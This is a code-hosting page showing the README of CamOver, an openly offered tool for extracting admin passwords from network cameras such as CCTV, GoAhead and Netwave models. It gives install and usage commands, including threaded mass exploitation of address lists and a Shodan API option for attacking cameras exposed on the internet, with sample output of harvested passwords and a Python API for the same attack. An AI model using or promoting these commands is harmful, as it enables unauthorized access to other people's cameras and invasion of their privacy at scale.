crash.software
Projects
Pull Requests
Issues
Builds
CamOver
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY CamOver Files
🤬
4299ab69
ROOT /
camover Loading last commit info...
LICENSE
README.md
setup.py
README.md

CamOver

CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

Features

  • Exploits vulnerabilities in most popular camera models such as CCTV, GoAhead and Netwave.
  • Optimized to exploit multiple cameras at one time from list with threading enabled.
  • Simple CLI and API usage.

Installation

pip3 install git+https://github.com/EntySec/CamOver

Basic usage

To use CamOver just type camover in your terminal.

usage: camover [-h] [--threads] [--output OUTPUT] [--input INPUT]
               [--address ADDRESS] [--api API]

CamOver is a camera exploitation tool that allows to disclosure network camera
admin password.

optional arguments:
  -h, --help         show this help message and exit
  --threads          Use threads for fastest work.
  --output OUTPUT    Output result to file.
  --input INPUT      Input file of addresses.
  --address ADDRESS  Single address.
  --api API          Shodan API key for exploiting devices over Internet.

Examples

Let's hack my camera just for fun.

camover --address 192.168.99.100

output:

[*] (192.168.99.100) - connecting to device...
[*] (192.168.99.100) - accessing device rom...
[*] (192.168.99.100) - extracting admin password...
[i] (192.168.99.100) - password: mamahacker123

Let's try to use opened database of hosts with --threads for fast exploitation.

camover --threads --input cameras.txt --output passwords.txt

It will exploit all cameras in cameras.txt list by their addresses and save all obtained passwords to passwords.txt.

output:

[*] Initializing thread #0...
[*] (x.x.x.x) - connecting to camera...
[*] Initializing thread #1...
[*] (x.x.x.x) - connecting to camera...
[*] Initializing thread #2...
[*] (x.x.x.x) - connecting to camera...
[*] (x.x.x.x) - accessing camera config...
[*] (x.x.x.x) - extracting admin password...
[i] Thread #0 completed.
[*] (x.x.x.x) - connecting to camera...
[*] (x.x.x.x) - accessing camera config...
[*] (x.x.x.x) - extracting admin password...
[i] Thread #1 completed.
[*] (x.x.x.x) - connecting to camera...
[*] (x.x.x.x) - accessing camera config...
[*] (x.x.x.x) - extracting admin password...
[i] Thread #2 completed.

CamOver API

CamOver also has their own Python API that can be invoked by importing CamOver to your code:

from camover import CamOver

Basic functions

There are all CamOver basic functions that can be used to exploit specified device.

  • connect(host) - Connect specified defice by network address.
  • exploit(device) - Exploit connected device.

Examples

from camover import CamOver

camover = CamOver()

camera = camover.connect('192.168.99.100')
print(camover.exploit(camera))

output:

'mamahacker123'
Please wait...
Page is in error, reload to recover